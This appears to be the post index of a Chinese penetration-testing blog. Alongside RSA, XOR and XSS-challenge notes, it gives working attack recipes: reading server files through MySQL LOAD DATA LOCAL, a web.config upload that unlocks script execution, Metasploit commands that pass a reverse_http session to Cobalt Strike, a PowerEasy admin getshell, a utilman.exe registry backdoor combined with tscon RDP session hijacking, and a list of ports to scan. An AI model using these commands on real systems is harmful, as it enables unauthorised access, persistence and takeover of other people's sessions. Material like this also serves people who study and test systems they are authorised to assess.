RSA 算法原理

| 热度 | 字数统计: 1,099 字 | 阅读时长: 5 分

先介绍两个概念, 对称加密算法和非对称加密算法.

对称加密算法

使用同一密钥进行加解密. 例如之前介绍的 xor, 也可以算作对称加密算法.

非对称加密算法

使用不同密钥进行加解密, 公开的叫公钥, 不公开的叫私钥, 使用公钥加密, 私钥解密.

RSA 是一种典型的非对称加密算法.

Read More

XSS Challenges 笔记

| 热度 | 字数统计: 1,271 字 | 阅读时长: 6 分

xss-quiz.int21h.jp

最近在看余大的那本书, 干货满满, 就闲的蛋疼的去做了下这个 xss 挑战.

17关和18关的 Hint 为 This stage works on only old version IE, 然后我就跳过了.

19关的 Twitter DOM-XSS 按照网上的 payload 也没有复现成功, 不知道是不是浏览器的问题.

Read More

xor encrypt

| 热度 | 字数统计: 234 字 | 阅读时长: 1 分

xor 异或运算表示 两个操作数的位中, 相同则为0, 不同则为1.

xor 的运算符一般为 ^ 或者 XOR, 例如 110^011 表示对 110 和 011 两个二进制数进行异或运算.

1
2
3
111^101 010
110^110 000
101^010 111

Read More

mysql load data local

| 热度 | 字数统计: 125 字 | 阅读时长: 1 分

当 LOAD DATA INFILE 指定 LOCAL 时, 用户无需 FILE 权限, 文件将由客户端读取, 并把数据发送至服务器上.

以当前执行命令用户的权限读取文件.

例如从 phpmyadmin 中执行语句, 用户权限就为 web 容器的权限.

1
2
3
create table `localfile` ( `content` LONGTEXT );
LOAD DATA LOCAL INFILE 'C:/WWWROOT/index.php' INTO TABLE `localfile` fields terminated by '';
select `content` from `localfile`;

如果显示不全或者其它奇怪的原因就在语句后面加上 LINES TERMINATED BY '\0'.

web.config 突破权限限制

| 热度 | 字数统计: 56 字 | 阅读时长: 1 分

在一个可读写的目录里无法执行脚本, 通过上传特殊的 web.config 文件突破限制.

1
2
3
4
5
6
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Write, Execute, Script" />
</system.webServer>
</configuration>

msf 派生 cobalt strike 会话

| 热度 | 字数统计: 116 字 | 阅读时长: 1 分
1
2
metasploit IP:192.168.1.100 PORT:4444
Cobalt Strike IP:192.168.1.101 PORT:5555

有 meterpreter 会话

利用 payload_inject 模块注入新的 payload.

1
2
3
4
5
6
7
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set session 1
set disablepayloadhandler true
run

无 meterpreter 会话

在监听时将 LHOSTLPORT 改成 Cobalt Strike 对应的 IP 和 PORT.

1
2
3
4
5
6
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set disablepayloadhandler true
run

powereasy 后台 getshell

| 热度 | 字数统计: 88 字 | 阅读时长: 1 分

系统设置 - 网站频道管理 - 下载中心 - 频道类型

将 上传文件的保存目录 改成 test.asp

最后左栏找到对应的频道直接上传, 抓包的路径不全, 还需要手动拼接下.

下载中心的目录为 /Soft/

其它频道的目录在 频道类型 - 频道目录 里.

mstsc tscon

| 热度 | 字数统计: 114 字 | 阅读时长: 1 分

System 权限

nt authority\system

放大镜 注册表劫持

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

query user 查看 ID

1
2
USERNAME        SESSIONNAME     ID  STATE  IDLE TIME   LOGON TIME
administrator rdp-tcp#1 1 Disc none 6/30/2018 10:00

输入命令 tcson 1

注意关闭远程桌面的时候不要点注销, 而是直接点右上角的X, 这样下次连接的时候还能进行切换.

common ports

| 热度 | 字数统计: 146 字 | 阅读时长: 1 分

由于 nmap 扫描网段开放端口 (TOP 1000) 的速度并不怎么理想 (可能是我姿势不对?), 就整理了一份常用的80多个端口.

包括但不限于 ftp ssh telnet ,各种 database application-server 和 web-server.

1
(21, 22, 23, 25, 53, 80, 81, 82, 88, 89, 110, 135, 139, 389, 443, 445, 873, 1080, 1433, 1521, 1723, 2049, 2082, 2083, 3128, 3306, 3311, 3312, 3389, 3390, 3690, 3780, 4440, 4848, 4899, 5432, 5631, 5900, 5901, 5902, 5984, 6082, 6379, 7000, 7001, 7002, 7778, 8000, 8001, 8002, 8008, 8011, 8080, 8081, 8082, 8088, 8089, 8090, 8091, 8099, 8180, 8181, 8182, 8649, 8834, 8888, 8899, 9000, 9080, 9081, 9082, 9090, 9091, 9200, 9300, 10050, 11211, 27017, 27018, 28017, 50000, 50030, 50060, 50070)